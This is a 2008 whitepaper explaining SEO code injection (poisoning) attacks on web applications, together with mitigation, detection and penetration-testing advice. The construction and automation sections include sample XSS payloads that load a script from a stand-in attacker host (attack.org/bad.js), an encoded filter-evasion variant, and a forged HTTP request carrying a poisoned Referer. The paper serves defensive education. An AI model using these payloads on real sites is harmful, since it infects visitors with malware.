TechnicalInfoBannerA
TechnicalInfoBannerB
TechnicalInfoBannerC

Whitepapers

  SEO Code Injection
Search Engine Optimization Poisoning
Published: August 2008

Search Engine Optimization (SEO) is a critical component in an organizations ability to be discovered by prospective customers and clients as they conduct online searches for information and products. It is a technique commonly employed by the largest and most sophisticated Internet businesses, and a key component of their online business strategy.

Unfortunately the nature of the SEO algorithms, and the subsequent modification of dynamic site content that they promote, means that they can often be manipulated by an attacker. Vulnerable Web applications can be used to propagate infectious code capable of compromising the organizations prospective customers and clients. This brief paper explains the technique referred to as SEO Code Injection or Poisoning, and the steps that may be taken to detect and mitigate the vulnerability.

Attack Objectives

Unlike standard SEO manipulation, which focuses on manipulating the relative page-rank positioning of results within popular search engines, SEO Code Injection attacks are designed to fool a Web application’s backend systems in to embedding malicious code within dynamically created page content. In a successful attack, any subsequent request for the targeted page (or related pages on the same site) will result in the attacker’s malicious code being included as part of the page content, and the code likely executed within the remote users Web browser during the page rendering process.

While an attacker could attempt to embed almost any kind of malicious code through a vulnerable SEO vector, in most cases the preferred method is to include short code segments that will cause a visitors Web browser to link to, and execute, more advanced malicious code elements hosted on external Web servers under the attackers direct control.

How it Works

In essence, SEO Code Injection is a fairly simple attack that targets Web site visitors by abusing poor application logic and exploiting content sanitization flaws within the backend Web application service.

For an attack to be successful, the Web application must provide three functions:

  •  The application must create page content dynamically based upon how the visitor initially reaches or finds a particular page, and embed elements of that data within a resultant page.
  • The application must “weigh” page content based upon the frequency of dynamic keywords; keywords that are typically used to optimize page ranking placement within search engine.
  • The application must fail to correctly sanitize user inputted data – in particular, data capable of containing HTML and scripting elements.

While the specific formulation of the attack can take on various forms depending upon the nuances of the vulnerable Web application itself, the process of conducting an attack is typically straight forward. The description below provides an explanation of the most common vectors used in attacks conducted in the first half of 2008.

  1.  Reconnaissance. To prepare for the attack, the attacker must first perform a degree of reconnaissance to identify the keywords and Web sites with vulnerable application services.

    A. Identify Keywords. The attacker identifies keywords that are likely to be searched for by potential victims of the attack. These words may be commonly searched for items (e.g. brand-name shoes, music bands, etc.) or, more commonly, keywords associated with major recent news events (e.g. drug overdoses, natural disasters, etc.).

    B. Identify Sites. The attacker identifies Web sites that consistently appear high in the page-ranking of search engine results. These are sites that typically refresh their page content frequently (e.g. News sites, blog sites, online sales sites, etc.), and already use dynamic SEO algorithms to affect search engine page-rank placements.

    C. Identify Vulnerabilities. The attacker tests the degree of data sanitization performed by the Web application logic. For example, what (if any) HTML tags are removed or filtered, and whether different forms of character encoding are allowed (e.g. escape encoding, Unicode encoding, UTF-8, etc.).
  2. Construction. Having performed their reconnaissance and decided upon the vulnerable Web sites to be targeted for the SEO Code Injection attack, the attacker must then construct the payload(s) that will be used to exploit the previously identified data sanitization flaws.

    A. REFERER Fields. Many SEO routines utilize the REFERER field contained within the HTTP header of a Web browser’s page request to decide upon which keywords should be included within page metadata. Whenever a user clicks on a link listed in the results returned by a search engine after inputting their search criteria, their resultant page request will contain a REFERER URL that not only contains information about the search engine they used, but also the keywords they were searching for.
    For example, a REFERER from the Google search for the words “Gunter Ollmann” may look like http://www.google.com/search?hl=en&q=Gunter+Ollmann while a query for “Günter Ollmann” may contain q=G%C3%BCnter+Ollmann within the REFERER.

    B. Site Search Criteria. Many popular sites also have local search engines for keyword searches within their own content. As site visitors utilize the local search capabilities, the Web application may monitor their keywords and record which specific content they subsequently viewed. If multiple keywords are searched for, and only a few of those keywords are contained within the most popular pages that visitors then go on to view, the SEO routines may selectively embed or cache these missing keywords in to the resultant page to increase the probability that the same page will be found in the future using the “missing” keywords.

    C. Malicious Keyword. Having decided upon the relevant SEO keyword injection vector, the attacker formulates the “keyword” he wishes to insert. In most recent public attacks, the “keyword” is a specially formatted link to an externally hosted malicious script; a script designed to exploit vulnerabilities within the victims Web browser and secretly install malware.
    Depending upon the degree of data sanitization of the vulnerable Web site and how it dynamically wraps additional keywords within the page content, the attacker may opt for links such as:
    ><iframe src=//attack.org/bad.js>
    or implement simple white-list evasion techniques such as:
                    %3Cscript%20src=%22http%3A%2F%2Fattack.org%2Fbad.js%22%3E%3C%2F
                    script%3E

    D. The Payload. The payload, whether it will be contained within the REFERER or submitted through the Web applications local search routines, will typically be included with other legitimate search keywords to ensure the “correct” pages are targeted. For example, the search query may be “Günter XSS ><iframe src=//attack.org/bad.js>” which would render in the REFERER as:
                    G%C3%BCnter+XSS+%3E%3Ciframe+src%3D%2F%2Fattack.org%2Fbad.js%3E
  3. Automation. In most cases, the SEO routines of popular vulnerable Web applications require a frequency threshold to be met. Based upon the frequency of a keyword, it may be placed in escalating positions within the dynamically generated page. For example, an infrequently referenced keyword may be embedded within the pages metadata tags, while a commonly searched for keyword may appear within the page title, or as part of the page’s file name (i.e. as part of the actual URL). In other cases, the entire search string may simply be cached by the application server and presented in its entirety on a page.

    A. Fake REFERER. Since HTTP is a stateless protocol, the targeted Web site must trust the Web browsers REFERER data as being correct. This information, along with any other HTTP request information, can be easily forged.
    Instead of having to repeatedly search for the keywords and click on the subsequent link to initiate a SEO Code Injection attack, the attacker can simply craft a stand-alone HTTP request packet and send that repeatedly instead – thereby greatly speeding up the attack (important if SEO thresholds are high), and removing the need for repeated use of an external search engine or even relying upon a Web browser.
    A crafted HTTP request may look like the following:
    GET /target_page.php HTTP/1.0
    Accept: */*
    Referer: http://www.google.com/search?hl=en&q= XSS+%3E%3Ciframe+src%3D%2F%2Fattack.org%2Fbad.js%3E
    Accept-Language: en-us
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0
    Host: www.vulnerable.com


    B. Distributed Submission. While it may be possible for a would-be attacker to repeatedly type their malicious keyword payloads in to the search engine, almost all SEO Code Injection attacks are conducted using automated tools. Once a HTTP request packet has been created, it can be repeatedly sent using any number of tools and scripts, or it may be farmed out to a botnet.
    Some Web application SEO routines check for additional submission data for uniqueness of the page request (e.g. cookies, IP address, etc.) – but can be easily overcome using a small degree of additional automation and distributed botnets or proxies.

It is important to note that the vulnerability being exploited lies within the Web application server’s SEO routines, and not with the method in which victims navigated to an infected page. For example, a home user may search for the keywords “XSS Attack”, and end up following a link to a page initially infected by an attacker who used different keywords (e.g. “Gunter XSS”). The actual “legitimate” keywords are irrelevant to the attacker, only the malicious SEO Code Injection content matters.

Mitigation Strategies

To protect against SEO Code Injection attacks, organizations have a number of mitigation strategies they can adopt. While secure development and testing processes are critical, defense in depth through the use of content inspection and filtering technologies can help protect against coding failures and unexpected injection vectors.

Coding Practices

A critical component to mitigating the threat of SEO Code Injection attacks is through the use of correct input sanitization. Ideally, any user-supplied content should be processed against a white-list of allowable characters prior to their use in search engine optimization or page creation routines. User-supplied data not inherently covered by the white-list should be automatically dropped. In particular, user-supplied HTML code characters (and their myriad of encoded forms) should never be embedded within page content unless specifically authorized, and its context fully understood by the application developer – even then, professional security advice should be sought. In almost all cases, non-ASCII alphanumeric characters should never be used in search optimization routines.

Since many SEO Code Injection attack attempts will likely be automated, application developers should consider the use of anti-automated tool mitigation strategies. These strategies could consist of temporal anomaly detection routines (e.g. flagging inconsistent bursts of network traffic), the use of submission source IP address information to identify uniqueness, and perhaps bad-IP lookups (e.g. are the source IP addresses known botnet agents, or located within heavily botnet saturated netblocks).

Content Inspection

Given the nature and construction of the actual malicious content (e.g. iframe, script, URL, etc.), and its placement within the HTTP page request (e.g. HTTP REFERER, HTTP GET, etc.), many perimeter and Web application protection systems have the capability to identify the embedded malicious content.

Intrusion Prevention Systems (IPS) that can deep-inspect HTTP headers and identify cross-site scripting, SQL Injection and other HTML code injection string formulations, can stop this malicious inbound content from making its way to the Web application server – thereby protecting any vulnerable SEO routines from attack and subsequent manipulation.

Content filtering technologies (e.g. perimeter URL filtering) can often be used to identify the inclusion of URL’s previously known to host malicious content. When complimenting Web proxy technologies, they can prevent end-users from navigating to malicious links that happen to be embedded within an affected SEO Code Injection vulnerable Web site.

Detection Strategies

The processes necessary to uncover whether a Web application is vulnerable to SEO Code Injection is not a trivial task. As with all second-order code injection attack formats, the fact that testing for its presence cannot typically be done by sending a single request, and does not result in an immediately verifiable response, means that standard code injection testing methodologies may fail to detect vulnerable vectors.

Tools

Current generation code auditing suites can sometimes be used to perform a static analysis review Web application source code. Depending upon the language the application has been written in, and the level of access granted to the source code, some tools are capable of detecting probable SEO Code Injection flaws. Since the attack vector is relatively new, and the fact that SEO routines themselves are constantly evolving, static analysis code auditing tools for Web applications still have some way to mature and will probably require a high degree of manual tuning.

Many commercial Web application vulnerability scanners are capable of manipulating HTTP header fields and identifying places within a vulnerable application that incorrectly sanitize data. However, sophisticated SEO routines which require thresholds to be met before triggering page content modification will likely go undetected unless the application vulnerability scanner is specifically configured to repeat tests until they exceed the threshold.

Penetration testing

Web application penetration testing methodologies need to encompass tests for identifying likely SEO Code Injection vulnerabilities and vectors. Ideally, testing should include:

  1. Checking any local application search functionality to identify whether search criteria can include HTML code characters and their encoded variants. Verifying that any search results rendered on subsequent pages are correctly sanitized.
  2. Manipulate HTTP header information on page requests (especially the REFERER and USER-AGENT fields) to identify whether the application is vulnerable standard cross-site scripting (XSS) and SQL Injection vectors.
  3. Manipulate HTTP REFERER information to impersonate popular search engine URL’s that contain monitored keywords and potentially dangerous characters.
  4. Consult with the developers to find out whether submission thresholds are applied to the SEO logic engine. If they are, repeat the submission of crafted REFERER information to reach beyond those thresholds and evaluate the applications correct sanitization of the test content.

Conclusions

2008 saw the birth of the threat now known as SEO Code injection or Poisoning. While SEO routines mature and adapt to changes in the Internet search page-ranking systems, organizations will continue to be exposed to new threats and attack vectors that exploit weaknesses in them.

Given the complexity in the way SEO routines function – in particular the algorithms behind repetitive keyword ranking – the process for detecting the presence of exploitable flaws in a Web application is more involved, and newer methodologies are required in order to detect SEO Code Injection vulnerabilities.
From a mitigation perspective, when deployed correctly, advanced IPS technologies can be configured to protect against the actual injection of the malicious payloads used in attacks against the Web application.

Additional Reading

“Massive IFRAME SEO Poisoning Attack Continuing”, Dancho Danchev, http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html

“More High Profile Sites IFRAME Injected”, Dancho Danchev, http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html

“URL Embedded Attacks”, Gunter Ollmann, http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html

“HTML Code Injection and Cross-site Scripting”, Gunter Ollmann, http://www.technicalinfo.net/papers/CSS.html

“Second-order Code Injection”, Gunter Ollmann, http://www.technicalinfo.net/papers/SecondOrderCodeInjection.html

“Stopping Automated Attack Tools”, Gunter Ollmann, http://www.technicalinfo.net/papers/StoppingAutomatedAttackTools.html

“SEO Poisoning Attacks Growing”, Robert Lemos,
http://www.securityfocus.com/brief/701

“A Second-order of XSS”, Gunter Ollmann,
http://blogs.iss.net/archive/SecondOrderXSS.html

 

     
    Copyright 2001-2008 © Gunter Ollmann